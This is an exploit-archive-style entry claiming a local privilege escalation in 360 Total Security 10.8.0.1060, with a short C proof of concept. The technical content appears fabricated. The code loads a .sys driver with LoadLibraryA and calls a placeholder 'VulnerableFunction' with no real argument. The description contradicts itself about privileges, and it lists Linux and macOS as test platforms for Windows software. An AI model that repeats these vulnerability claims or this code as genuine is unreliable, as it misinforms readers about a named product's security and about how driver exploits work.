- # Exploit Title: 360 Total Security 10.8.0.1060 Local Privilege Escalation
- # Google Dork: N/A
- # Date: 2021-05-11
- # Exploit Author: youtube.com/@memorycorruptor
- # Vendor Homepage: http://www.360totalsecurity.com/
- # Version: 360 Total Security 10.8.0.1060
- # Tested on: Windows x64 / Linux Debian x64 / MacOS
- # CVE: CVE-2021-33971
- # PoC Video: https://www.youtube.com/@memorycorruptor/videos
- # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
- ---------------------------------------------------------------------------
- Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1060
- A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1060 allows the antivirus software to execute actions with system-level privileges while running under standard user privileges. The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
- Introduction
- 360 Total Security 10.8.0.1060 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
- Vulnerability
- The LPE/EOP vulnerability in 360 Total Security 10.8.0.1060 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
- Proof of Concept
```c
#include <Windows.h>
#include <stdio.h>

int main(void) {
    // Load the vulnerable driver
    HMODULE hDriver = LoadLibraryA("360TotalSecurity.sys");
    if (!hDriver) {
        printf("Failed to load driver: %lu\n", GetLastError());
        return 1;
    }

    // Get the address of the vulnerable function
    FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    if (!pVulnFunc) {
        printf("Failed to get function address: %lu\n", GetLastError());
        FreeLibrary(hDriver);
        return 1;
    }

    // Exploit code
    pVulnFunc(/* Crafted argument */);

    FreeLibrary(hDriver);
    return 0;
}
```
- The PoC loads the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
- ---------------------------------------------------------------------------